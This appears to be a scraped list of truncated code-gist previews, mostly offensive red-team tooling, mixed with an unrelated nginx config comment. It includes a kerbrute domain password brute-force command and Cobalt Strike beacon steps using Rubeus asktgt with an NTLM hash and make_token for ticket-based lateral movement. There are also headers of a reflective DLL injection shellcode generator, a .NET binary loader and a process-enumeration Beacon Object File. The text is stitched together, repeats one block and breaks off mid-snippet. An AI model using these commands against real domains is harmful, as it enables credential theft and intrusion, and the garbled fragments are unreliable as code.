With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
##### IF ELEVATED: | |
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X) | |
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH | |
# decode the base64 blob to a binary .kirbi | |
$ base64 -d ticket.b64 > ticket.kirbi | |
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT) | |
beacon> make_token DOMAIN\USER PassWordDoesntMatter |
package main | |
/* | |
Example Go program with multiple .NET Binaries embedded | |
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
$ go get -u github.com/gobuffalo/packr/packr | |
Place all your EXEs are in a "binaries" folder |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
package main | |
/* | |
* | |
* This is just a Go implementation of https://github.com/monoxgas/sRDI/ | |
* Useful if you're trying to generate shellcode for reflective DLL | |
* injection in Go, otherwise probably not much use :) | |
* | |
* The project, shellcode, most comments within this project | |
* are all from the original project by @SilentBreakSec's Nick Landers (@monoxgas) |
events { | |
# nginx requires this section even when applying all default values | |
} | |
http { | |
# Upstream keyword is followed by a url (domain name/IP). This reference encapsulates | |
# the list of backend servers defined for a virtual proxy. When autnenticating | |
# a certificate from a backend server, the upstream url is supplied to the | |
# certificate authentication process instead of the backend server name. See | |
# the comments associated with proxy_pass below for a detailed discussion. |
#!/usr/bin/env python | |
from __future__ import print_function | |
import hashlib | |
import itertools | |
import os | |
import sys | |
__author__ = "Justin Lucas" | |
__email__ = "jlucas@ingressive.com" |
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
import argparse | |
import sys | |
def auto_int(x): | |
return int(x, 0) | |
# Modded by Matteo 'uf0' Malvica - 2021 | |
# The following code is taken from | |
# https://github.com/mwrlabs/win_driver_plugin/blob/master/win_driver_plugin/ioctl_decoder.py |
import frida | |
import sys | |
def on_message(message, data): | |
if message['type'] == 'send': | |
print(message['payload']) | |
elif message['type'] == 'error': | |
print(message['stack']) | |
else: | |
print(message) |
/* | |
The vulnerable function takes as input an array of bytes and outputs their hex representation in unicode. The hex encoded bytes are separated by space (0x20) | |
For example: | |
user input : 0 129 | |
output buffer (vulnerable_chunk): 30 00 30 00 20 00 38 00 31 00 20 00 | |
With regards to the vulnerability itself, the problem exists in the output buffer (vulnerable_chunk) size calculation: | |
vulnerable_chunk_size = (user_controlled_size*6)%65536; | |
vulnerable_chunk = AllocateMemory(vulnerable_chunk_size); |